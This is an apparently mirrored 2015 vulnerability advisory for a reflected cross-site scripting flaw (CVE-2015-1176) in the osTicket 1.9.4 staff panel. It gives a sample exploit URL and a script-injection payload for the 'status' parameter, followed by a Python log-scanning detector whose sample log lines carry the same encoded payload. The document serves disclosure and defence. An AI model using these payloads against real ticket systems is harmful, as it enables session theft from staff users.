packetstorm | Sudhanshu Chauhan | PACKETSTORM:130057
History: Jan 22, 2015 - 12:00 a.m.

osTicket 1.9.4 Cross Site Scripting

2015-01-22 00:00:00
Sudhanshu Chauhan
packetstormsecurity.com

EPSS: 0.005 (Low), percentile 75.6%

`CVE-2015-1176-xss-osticket  
  
  
Information  
----------------  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in osTicket Ticket system  
Affected Software : osTicket  
Affected Versions: 1.9.4 and possibly below  
Vendor Homepage : http://osticket.com/  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1176  
  
Impact  
----------  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
-------------------------  
Sample URL:  
http://localhost/osticket/upload/scp/tickets.php?a=search&status=032"><script>alert(1)<%2fscript>&uid=3  
  
Parameter:  
status  
  
Sample Payload:  
"><script>alert(1)</script>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
-----------------------------------------------  
12/15/2014 – Reported  
01/02/2015 – Vulnerability Fixed  
01/18/2015 – Advisory Released  
  
  
--   
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`
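
A defender-side check for the request pattern shown under Technical Details, added here as an example and not part of the original advisory or of osTicket: it scans web access logs for requests to `scp/tickets.php` whose `status` parameter decodes to HTML markup. The combined log format, the sample lines, and the allowed-token pattern for `status` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a value break out of an HTML attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"\'`]')
# Assumption: a legitimate status filter is a short alphanumeric token.
EXPECTED_STATUS_RE = re.compile(r'^[A-Za-z0-9_-]{0,32}$')


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_status_requests(log_lines):
    """Return (line_number, decoded_status, reason) for suspect requests."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/scp/tickets.php"):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name != "status":
                continue
            value = fully_decode(value)
            if MARKUP_RE.search(value):
                findings.append((number, value, "markup"))
            elif not EXPECTED_STATUS_RE.match(value):
                findings.append((number, value, "unexpected"))
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jan/2015:10:00:01 +0000] "GET /osticket/upload/scp/tickets.php?a=search&status=open&uid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Jan/2015:10:00:07 +0000] "GET /osticket/upload/scp/tickets.php?a=search&status=032%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E&uid=3 HTTP/1.1" 200 5301',
    '203.0.113.9 - - [22/Jan/2015:10:00:09 +0000] "GET /osticket/upload/scp/tickets.php?a=search&status=%253Cb%253E HTTP/1.1" 200 5290',
    '203.0.113.7 - - [22/Jan/2015:10:00:12 +0000] "GET /osticket/upload/index.php?status=%3Cb%3E HTTP/1.1" 200 900',
]
```

Hits on a host still running an affected version (1.9.4 and possibly below) are worth correlating with the staff session that followed the link, since the page is under the staff control panel path.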
